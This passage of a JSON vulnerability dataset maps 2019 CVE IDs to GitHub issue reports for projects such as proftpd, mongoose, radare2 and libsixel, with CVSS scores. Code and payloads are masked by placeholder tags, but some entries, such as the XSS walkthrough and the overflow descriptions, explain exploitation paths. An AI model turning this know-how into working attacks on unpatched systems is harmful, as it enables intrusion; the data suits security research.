  40672. "description": "Improper TLS CRL handling NUMBERTAG in mod_tls of APITAG master HEAD. This is the NUMBERTAG nd of NUMBERTAG bugs in the APITAG function. The code fails to perform a CRL lookup by issuer (as the comment right above the block states), it instead performs a second lookup by subject. As a result, in our tests, after crash bugs NUMBERTAG and NUMBERTAG issue NUMBERTAG and issue NUMBERTAG were fixed, APITAG still failed to take into account a valid CRL and break a connection. The patch is as follows: CODETAG At least two other pieces of similar code, which contain the same comment as this one, are getting it right: FILETAG FILETAG (outdated stunnel NUMBERTAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I hit this issue in the summer of NUMBERTAG after fixing the two crashes (issue NUMBERTAG and issue NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
  40673. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  40674. "severity": "HIGH",
  40675. "baseScore": 7.5,
  40676. "impactScore": 3.6,
  40677. "exploitabilityScore": 3.9
  40678. },
  40679. {
  40680. "CVE_ID": "CVE-2019-19271",
  40681. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/860",
  40682. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/860",
  40683. "Repo_new": "proftpd/proftpd",
  40684. "Issue_Created_At": "2019-11-04T16:09:38Z",
  40685. "description": "Improper TLS CRL handling NUMBERTAG in mod_tls of APITAG NUMBERTAG For tracking purposes (this problem is fixed in NUMBERTAG This is the NUMBERTAG rd of NUMBERTAG bugs in the APITAG function. The wrong iteration variable is passed to APITAG probably causing some CRL entries to be ignored. From the NUMBERTAG branches diff: CODETAG FWIW as well NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I didn't hit this issue in the summer of NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package, because the set of test CRLs only contained CRLs revoking at most one certificate, but I noticed it in the NUMBERTAG diff. I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
  40686. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  40687. "severity": "HIGH",
  40688. "baseScore": 7.5,
  40689. "impactScore": 3.6,
  40690. "exploitabilityScore": 3.9
  40691. },
  40692. {
  40693. "CVE_ID": "CVE-2019-19272",
  40694. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/858",
  40695. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/858",
  40696. "Repo_new": "proftpd/proftpd",
  40697. "Issue_Created_At": "2019-11-04T16:07:44Z",
  40698. "description": "APITAG (nullptr dereference NUMBERTAG with CRLs in mod_tls of APITAG NUMBERTAG For tracking purposes (this problem is fixed in NUMBERTAG This is the NUMBERTAG st of NUMBERTAG bugs in the APITAG function. It's a direct nullptr dereference: variable initialized to NULL, then dereferenced. I fixed it on my side, then I noticed that it had been fixed upstream in NUMBERTAG From the NUMBERTAG branches diff: CODETAG I'd have expected this kind of issues to be caught by static analysis. Additionally, on my side, I used the following change: APITAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . My colleagues hit this crash in the summer of NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG and then I was tasked to debug the issue. I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
  40699. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40700. "severity": "HIGH",
  40701. "baseScore": 7.5,
  40702. "impactScore": 3.6,
  40703. "exploitabilityScore": 3.9
  40704. },
  40705. {
  40706. "CVE_ID": "CVE-2019-19306",
  40707. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/16",
  40708. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/16",
  40709. "Repo_new": "cybersecurityworks/disclosed",
  40710. "Issue_Created_At": "2019-10-16T11:06:22Z",
  40711. "description": "ZOHO CRM Lead Magnet version NUMBERTAG Details: ZOHO CRM Lead Magnet version NUMBERTAG Bug Report Bug Name: Reflected Cross Site Scripting (XSS) in APITAG Plugin Product Name: APITAG Server: (ZOHO CRM Lead Magnet version NUMBERTAG ersion NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Severity: High Status: Fixed Exploitation Requires Authentication?: yes Vulnerable URL: URLTAG Vulnerable Variable: APITAG & APITAG & APITAG APITAG Description: A cross site scripting (XSS) attack can cause arbitrary code (java script) to run in a user\u2019s browser while the browser is connected to a trusted web site. The application targets your application\u2019s users and not the application itself, but it uses your application as the vehicle for the attack. XSS payload is executing when the user loads a create lead form page created in APITAG Zoho CRM Lead Magnet Version NUMBERTAG APITAG Proof of concept: (POC) APITAG NUMBERTAG APITAG By exploiting a Cross site scripting vulnerability an attacker can easily gain access to a user\u2019s session by stealing cookies and also exploit the user browser NUMBERTAG Login to the application NUMBERTAG Install Zoho CRM Lead Magnet Plugin [ URLTAG Figure NUMBERTAG Zoho CRM Lead Magnet NUMBERTAG Configure the APITAG client id APITAG and APITAG secret key APITAG Figure NUMBERTAG client key and secret id are filled in Authenticating Zoho CRM Plugin NUMBERTAG Click on APITAG New Form APITAG button and fill the values and click on APITAG APITAG button Figure NUMBERTAG new form in Zoho CRM Plugin NUMBERTAG Add the payload APITAG APITAG APITAG to the vulnerable parameters by intercepting the request in a proxy tool. \nFigure NUMBERTAG Request with XSS payload sent to the server Figure NUMBERTAG Request and response captured in the proxy NUMBERTAG Injected XSS payload is successfully executed when the user visits or reloads the page Figure NUMBERTAG The APITAG is successfully executed in the victim browser context Figure NUMBERTAG The APITAG application running on version NUMBERTAG Figure NUMBERTAG The APITAG APITAG CRM Lead Magnet plugin Version NUMBERTAG APITAG Figure NUMBERTAG The default cross site scripting mitigation setting in wp.config file to prevent cross site scripting attacks. APITAG Steps APITAG NUMBERTAG Logon into APITAG application in localhost NUMBERTAG Access the vulnerable GET Request URL[ URLTAG with XSS payload inserted into the vulnerable variable NUMBERTAG SS will get executed in the user machine once the user clicks on the given vulnerable link. APITAG APITAG NUMBERTAG Discovered in APITAG Product NUMBERTAG Reported to EMAILTAG rg NUMBERTAG Got instant response from APITAG plugin team( EMAILTAG rg) acknowledging the Vulnerability NUMBERTAG Got mail confirming that the issue existed and was fixed. APITAG by: APITAG Saran Baskar from APITAG Cyber Security Works Pvt Ltd APITAG",
  40712. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  40713. "severity": "MEDIUM",
  40714. "baseScore": 5.4,
  40715. "impactScore": 2.7,
  40716. "exploitabilityScore": 2.3
  40717. },
  40718. {
  40719. "CVE_ID": "CVE-2019-19307",
  40720. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1055",
  40721. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1055",
  40722. "Repo_new": "cesanta/mongoose",
  40723. "Issue_Created_At": "2019-10-02T06:55:52Z",
  40724. "description": "Integer overflow when decoding mqtt variable length. The problem occurs in function APITAG , when the broker processes a message , first it decodes a sequence of bytes from the NUMBERTAG nd to get the length of data and then determines the end of data by summing up p and len : ERRORTAG However, if len is too large, the value of end becomes less than the value of p . And the root cause here is this line: APITAG Using a modern gcc compiler on linux, when the broker casts down to the data type of len ( which is APITAG ), the value will be auto cast to NUMBERTAG bit. ERRORTAG and the result is: APITAG Exploiting the concept of NUMBERTAG s complement, we can control the value of end from APITAG to APITAG . Impact: Remote APITAG if the value of end equals APITAG , then the current message won't be removed from the IO buffer, which leads to an infinite loop ( for example: the broker is always busy if we send this payload APITAG , tested on the latest version of Mongoose on Ubuntu ) Potential out of bound access: because the value of end may be less than APITAG , it can be exploited as an out of bound read/write in further developments",
  40725. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40726. "severity": "CRITICAL",
  40727. "baseScore": 9.8,
  40728. "impactScore": 5.9,
  40729. "exploitabilityScore": 3.9
  40730. },
  40731. {
  40732. "CVE_ID": "CVE-2019-19316",
  40733. "Issue_Url_old": "https://github.com/hashicorp/terraform/issues/23493",
  40734. "Issue_Url_new": "https://github.com/hashicorp/terraform/issues/23493",
  40735. "Repo_new": "hashicorp/terraform",
  40736. "Issue_Created_At": "2019-11-25T21:15:04Z",
  40737. "description": "State transmitted in cleartext for azurerm backend with SAS token. APITAG Terraform Version APITAG CODETAG Expected Behavior APITAG Terraform should transfer state over HTTPS Actual Behavior APITAG Terraform transmits the state over HTTP Steps to Reproduce APITAG NUMBERTAG Create a SAS token for the storage account with either the spr set to APITAG or not present NUMBERTAG Run a plan using the SAS token for authenticating Additional Context APITAG This was originally discovered under the azure provider as URLTAG and is related to URLTAG Terraform is still using an older version of the SDK which doesn't have this fix. Workarounds are to set the spr to https or use an access key instead. With the SDK fix, if spr is APITAG , then HTTP is also used instead of HTTPS. References APITAG URLTAG URLTAG",
  40738. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  40739. "severity": "HIGH",
  40740. "baseScore": 7.5,
  40741. "impactScore": 3.6,
  40742. "exploitabilityScore": 3.9
  40743. },
  40744. {
  40745. "CVE_ID": "CVE-2019-19375",
  40746. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5998",
  40747. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5998",
  40748. "Repo_new": "octopusdeploy/issues",
  40749. "Issue_Created_At": "2019-11-14T02:15:57Z",
  40750. "description": "Placeholder issue. Details coming soon. Relates to URLTAG",
  40751. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40752. "severity": "MEDIUM",
  40753. "baseScore": 5.3,
  40754. "impactScore": 1.4,
  40755. "exploitabilityScore": 3.9
  40756. },
  40757. {
  40758. "CVE_ID": "CVE-2019-19376",
  40759. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6005",
  40760. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6005",
  40761. "Repo_new": "octopusdeploy/issues",
  40762. "Issue_Created_At": "2019-11-14T05:14:54Z",
  40763. "description": "Placeholder issue. Details coming soon. Relates to APITAG NUMBERTAG",
  40764. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  40765. "severity": "MEDIUM",
  40766. "baseScore": 6.5,
  40767. "impactScore": 3.6,
  40768. "exploitabilityScore": 2.8
  40769. },
  40770. {
  40771. "CVE_ID": "CVE-2019-19507",
  40772. "Issue_Url_old": "https://github.com/manvel-khnkoyan/jpv/issues/6",
  40773. "Issue_Url_new": "https://github.com/manvel-khnkoyan/jpv/issues/6",
  40774. "Repo_new": "manvel-khnkoyan/jpv",
  40775. "Issue_Created_At": "2019-11-28T22:12:05Z",
  40776. "description": "A vulnerability in APITAG We found that a maliciously crafted json can bypass the validation logics of the jpv. The vulnerability is from the following code: jpv leverages the built in constructor of unsafe user input to detect type information. However, a crafted payload can overwrite this builtin attribute to manipulate the validation result. URLTAG Reproduce Script CODETAG",
  40777. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  40778. "severity": "MEDIUM",
  40779. "baseScore": 5.3,
  40780. "impactScore": 1.4,
  40781. "exploitabilityScore": 3.9
  40782. },
  40783. {
  40784. "CVE_ID": "CVE-2019-19588",
  40785. "Issue_Url_old": "https://github.com/kvesteri/validators/issues/86",
  40786. "Issue_Url_new": "https://github.com/python-validators/validators/issues/86",
  40787. "Repo_new": "python-validators/validators",
  40788. "Issue_Created_At": "2018-06-06T23:00:03Z",
  40789. "description": "Text string that causes APITAG to lock at NUMBERTAG CPU usage. The following string makes validators NUMBERTAG get locked at NUMBERTAG CPU forever. APITAG Logs: CODETAG APITAG APITAG never ends. If I go to htop, the python process is at NUMBERTAG CPU) With version NUMBERTAG this doesn't happen. Logs: CODETAG The environment for tests was the APITAG Docker image from NUMBERTAG days ago. Temporary fix: uninstall NUMBERTAG and install NUMBERTAG",
  40790. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40791. "severity": "HIGH",
  40792. "baseScore": 7.5,
  40793. "impactScore": 3.6,
  40794. "exploitabilityScore": 3.9
  40795. },
  40796. {
  40797. "CVE_ID": "CVE-2019-19590",
  40798. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/15543",
  40799. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/15543",
  40800. "Repo_new": "radareorg/radare2",
  40801. "Issue_Created_At": "2019-12-04T09:29:34Z",
  40802. "description": "Integer Overflow in APITAG at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | None | Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gcb NUMBERTAG b5e8f commit: APITAG build NUMBERTAG Expected behavior CODETAG Actual behavior APITAG Steps to reproduce the behavior Follow the command I list above Additional Logs, screenshots, source code, configuration dump, ... In r_asm_massemble URLTAG at FILETAG , when r2 tries to assemble a long input with too many tokens , new_token_size URLTAG will integer-overflow to zero. Later, realloc(tokens, sizeof (char ) new_tokens_size) URLTAG will actually free tokens , leading to a Use After Free . More seriously, the freed tokens can be filled with arbitrary data, which could be exploited for RCE. The bug code is listed below; a quick fix would be to add an upper boundary check for APITAG CODETAG",
  40803. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40804. "severity": "HIGH",
  40805. "baseScore": 7.8,
  40806. "impactScore": 5.9,
  40807. "exploitabilityScore": 1.8
  40808. },
  40809. {
  40810. "CVE_ID": "CVE-2019-19601",
  40811. "Issue_Url_old": "https://github.com/pkubowicz/opendetex/issues/60",
  40812. "Issue_Url_new": "https://github.com/pkubowicz/opendetex/issues/60",
  40813. "Repo_new": "pkubowicz/opendetex",
  40814. "Issue_Created_At": "2019-12-05T08:11:30Z",
  40815. "description": "Buffer overflow in the APITAG function. Hi, While fuzzing APITAG with Honggfuzz, I found a buffer overflow in the APITAG function, in detex.l. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  40816. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40817. "severity": "HIGH",
  40818. "baseScore": 7.8,
  40819. "impactScore": 5.9,
  40820. "exploitabilityScore": 1.8
  40821. },
  40822. {
  40823. "CVE_ID": "CVE-2019-19602",
  40824. "Issue_Url_old": "https://github.com/golang/go/issues/35777",
  40825. "Issue_Url_new": "https://github.com/golang/go/issues/35777",
  40826. "Repo_new": "golang/go",
  40827. "Issue_Created_At": "2019-11-22T15:24:36Z",
  40828. "description": "runtime: memory corruption on Linu NUMBERTAG from async preemption. We've had several reports of memory corruption on Linu NUMBERTAG or later) kernels from people running tip since asynchronous preemption was committed. This is a super bug to track these issues. I suspect they all have one root cause. Typically these are \"runtime error: invalid memory address or nil pointer dereference\" or \"runtime: unexpected return pc\" panics. They can also appear as self detected data corruption. If you encounter a crash that could be random memory corruption, are running Linu NUMBERTAG or later, and are running a recent tip Go (after commit APITAG please file a new issue and add a comment here. If you can reproduce it, please try setting \"GODEBUG=asyncpreemptoff NUMBERTAG in your environment and seeing if you can still reproduce it. Duplicate issues (I'll edit this comment to keep this up to date): runtime: corrupt binary export data seen after signal preemption CL NUMBERTAG Corruption in file version header observed by vet. Medium reproducible. Strong leads. cmd/compile: panic during early copyelim crash NUMBERTAG Invalid memory address in PATHTAG Not reproducible. Nothing obvious in stack trace. Haven't dug into assembly.",
  40829. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
  40830. "severity": "MEDIUM",
  40831. "baseScore": 6.1,
  40832. "impactScore": 4.2,
  40833. "exploitabilityScore": 1.8
  40834. },
  40835. {
  40836. "CVE_ID": "CVE-2019-19624",
  40837. "Issue_Url_old": "https://github.com/opencv/opencv/issues/14554",
  40838. "Issue_Url_new": "https://github.com/opencv/opencv/issues/14554",
  40839. "Repo_new": "opencv/opencv",
  40840. "Issue_Created_At": "2019-05-14T13:24:09Z",
  40841. "description": "APITAG segfault for small images. System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Any Compiler => Any Detailed description APITAG segfaults for small images. The problem is in the calculation of pyramid scales. Variable APITAG is assumed to be greater than or equal to APITAG in APITAG / APITAG functions, while this is not true for small images. Actually, APITAG can be even less than NUMBERTAG If APITAG is less than APITAG , the loop body in APITAG / APITAG functions doesn't execute and Ux , Uy arrays are accessed out of bounds URLTAG . As a solution, the finest level may be selected depending on the coarsest level as in the DIS author's code URLTAG instead of a constant for every preset, while the coarsest level may be limited to be greater than or equal to zero. Steps to reproduce CODETAG",
  40842. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
  40843. "severity": "MEDIUM",
  40844. "baseScore": 6.5,
  40845. "impactScore": 2.5,
  40846. "exploitabilityScore": 3.9
  40847. },
  40848. {
  40849. "CVE_ID": "CVE-2019-19625",
  40850. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/922",
  40851. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/922",
  40852. "Repo_new": "aliasrobotics/rvd",
  40853. "Issue_Created_At": "2019-12-05T21:44:23Z",
  40854. "description": "SROS2 leaks node information. ERRORTAG",
  40855. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40856. "severity": "MEDIUM",
  40857. "baseScore": 5.3,
  40858. "impactScore": 1.4,
  40859. "exploitabilityScore": 3.9
  40860. },
  40861. {
  40862. "CVE_ID": "CVE-2019-19627",
  40863. "Issue_Url_old": "https://github.com/ros2/sros2/issues/172",
  40864. "Issue_Url_new": "https://github.com/ros2/sros2/issues/172",
  40865. "Repo_new": "ros2/sros2",
  40866. "Issue_Created_At": "2019-12-06T10:08:16Z",
  40867. "description": "SROS2 leaks node information, regardless of rtps_protection_kind setup . Bug report Connected to URLTAG After this patch one wold expect that node information isn't disclosed anymore but testing led to a different result. I'm not that experienced with APITAG at this point so I might be missing something? Ping to MENTIONTAG and MENTIONTAG Operating System: OS NUMBERTAG Ubuntu NUMBERTAG Installation type: from sources Version or commit hash: dashing eloquent master ( URLTAG DDS implementation: APITAG Client library (if applicable): rclpy Steps to reproduce issue Change defaults set APITAG to encrypt and recreate keys. URLTAG Expected behavior Communications are encrypted for third parties (without credentials) in the network, node information isn't disclosed. Actual behavior Node information is still disclosed. Even after applying URLTAG , rebuilding APITAG and regenerating the keys. Additional information Connected to URLTAG",
  40868. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  40869. "severity": "MEDIUM",
  40870. "baseScore": 5.3,
  40871. "impactScore": 1.4,
  40872. "exploitabilityScore": 3.9
  40873. },
  40874. {
  40875. "CVE_ID": "CVE-2019-19630",
  40876. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/370",
  40877. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/370",
  40878. "Repo_new": "michaelrsweet/htmldoc",
  40879. "Issue_Created_At": "2019-12-06T17:57:51Z",
  40880. "description": "Stack based buffer overflow in the APITAG function. Hi, While fuzzing htmldoc with Honggfuzz, I found a stack based buffer overflow in the APITAG function, in string.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  40881. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40882. "severity": "HIGH",
  40883. "baseScore": 7.8,
  40884. "impactScore": 5.9,
  40885. "exploitabilityScore": 1.8
  40886. },
  40887. {
  40888. "CVE_ID": "CVE-2019-19635",
  40889. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/103",
  40890. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/103",
  40891. "Repo_new": "saitoha/libsixel",
  40892. "Issue_Created_At": "2019-12-02T10:49:48Z",
  40893. "description": "A heap buffer overflow in function sixel_decode_raw_impl at APITAG NUMBERTAG due to integer overflow. libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. si EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libsixel NUMBERTAG There is a/an heap buffer overflow in function sixel_decode_raw_impl at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
  40894. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40895. "severity": "CRITICAL",
  40896. "baseScore": 9.8,
  40897. "impactScore": 5.9,
  40898. "exploitabilityScore": 3.9
  40899. },
  40900. {
  40901. "CVE_ID": "CVE-2019-19636",
  40902. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/104",
  40903. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/104",
  40904. "Repo_new": "saitoha/libsixel",
  40905. "Issue_Created_At": "2019-12-02T10:51:14Z",
  40906. "description": "An integer overflow in function sixel_encode_body at APITAG NUMBERTAG libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG SEGV_UNKNOW description An issue was discovered in libsixel NUMBERTAG There is an integer overflow in function sixel_encode_body at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
  40907. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40908. "severity": "CRITICAL",
  40909. "baseScore": 9.8,
  40910. "impactScore": 5.9,
  40911. "exploitabilityScore": 3.9
  40912. },
  40913. {
  40914. "CVE_ID": "CVE-2019-19637",
  40915. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/105",
  40916. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/105",
  40917. "Repo_new": "saitoha/libsixel",
  40918. "Issue_Created_At": "2019-12-02T10:52:00Z",
  40919. "description": "An integer overflow in function sixel_decode_raw_impl at APITAG libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. si EMAILTAG NUMBERTAG integer_overflow description An issue was discovered in libsixel NUMBERTAG There is an integer overflow in function sixel_decode_raw_impl at APITAG commandline img2sixel APITAG o /dev/null source In a while loop, it do not check if integer overflow is in APITAG CODETAG",
  40920. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40921. "severity": "CRITICAL",
  40922. "baseScore": 9.8,
  40923. "impactScore": 5.9,
  40924. "exploitabilityScore": 3.9
  40925. },
  40926. {
  40927. "CVE_ID": "CVE-2019-19638",
  40928. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/102",
  40929. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/102",
  40930. "Repo_new": "saitoha/libsixel",
  40931. "Issue_Created_At": "2019-12-02T10:47:41Z",
  40932. "description": "A heap buffer overflow found in function load_pnm at APITAG NUMBERTAG due to integer overflow. libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libsixel NUMBERTAG There is a/an heap buffer overflow in function load_pnm at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source ERRORTAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
  40933. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40934. "severity": "CRITICAL",
  40935. "baseScore": 9.8,
  40936. "impactScore": 5.9,
  40937. "exploitabilityScore": 3.9
  40938. },
  40939. {
  40940. "CVE_ID": "CVE-2019-19647",
  40941. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/15545",
  40942. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/15545",
  40943. "Repo_new": "radareorg/radare2",
  40944. "Issue_Created_At": "2019-12-06T07:49:36Z",
  40945. "description": "Lack of Validation Check for APITAG at APITAG . Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | None | Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gb7cc NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior APITAG Actual behavior APITAG Steps to reproduce the behavior Please follow the steps I list above Additional Logs, screenshots, source code, configuration dump, ... At FILETAG , the lack of validation check of variable content URLTAG will cause crash and arbitrary read via craft input. below is the vulnerable code. CODETAG If APITAG tries to open an invalid file, content will be NULL. Later, because skip is the input number, APITAG will cause crash, or arbitrary write via crafted input.",
  40946. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40947. "severity": "HIGH",
  40948. "baseScore": 7.8,
  40949. "impactScore": 5.9,
  40950. "exploitabilityScore": 1.8
  40951. },
  40952. {
  40953. "CVE_ID": "CVE-2019-19648",
  40954. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/1178",
  40955. "Issue_Url_new": "https://github.com/virustotal/yara/issues/1178",
  40956. "Repo_new": "virustotal/yara",
  40957. "Issue_Created_At": "2019-12-08T08:50:29Z",
  40958. "description": "Out of Bounds Memory Access in macho module. In FILETAG , yara doesn't check whether the variable command_size URLTAG is consistent with the command's real size. A crafted macho file will lead an out of bounds memory access later. Following is the bug code. ERRORTAG If the size is NUMBERTAG APITAG , and there is only one command whose size is APITAG . The memory layout of the crafted macho would look like: APITAG Thus, when yara tries to handle the second command here URLTAG , yara will access the address after data URLTAG , causing an out of bounds memory access. This will cause crash or potentials code executions. The poc is attach: ERRORTAG FILETAG",
  40959. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40960. "severity": "HIGH",
  40961. "baseScore": 7.8,
  40962. "impactScore": 5.9,
  40963. "exploitabilityScore": 1.8
  40964. },
  40965. {
  40966. "CVE_ID": "CVE-2019-19698",
  40967. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/25",
  40968. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/25",
  40969. "Repo_new": "marc-q/libwav",
  40970. "Issue_Created_At": "2019-10-24T07:14:38Z",
  40971. "description": "SEGV in function wav_content_read in libwav.c. SEGV in function wav_content_read in libwav.c Tested in Ubuntu NUMBERTAG bit I use the FILETAG and the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information: ERRORTAG I use gcc NUMBERTAG and APITAG to build libwav, this FILETAG can cause SEGV signal in function PATHTAG when running the wav_gain in folder tools/wav_gain with the following command: APITAG This is the ASAN information: ERRORTAG",
  40972. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  40973. "severity": "MEDIUM",
  40974. "baseScore": 6.5,
  40975. "impactScore": 3.6,
  40976. "exploitabilityScore": 2.8
  40977. },
  40978. {
  40979. "CVE_ID": "CVE-2019-19702",
  40980. "Issue_Url_old": "https://github.com/modoboa/modoboa-dmarc/issues/38",
  40981. "Issue_Url_new": "https://github.com/modoboa/modoboa-dmarc/issues/38",
  40982. "Repo_new": "modoboa/modoboa-dmarc",
  40983. "Issue_Created_At": "2019-11-25T22:32:21Z",
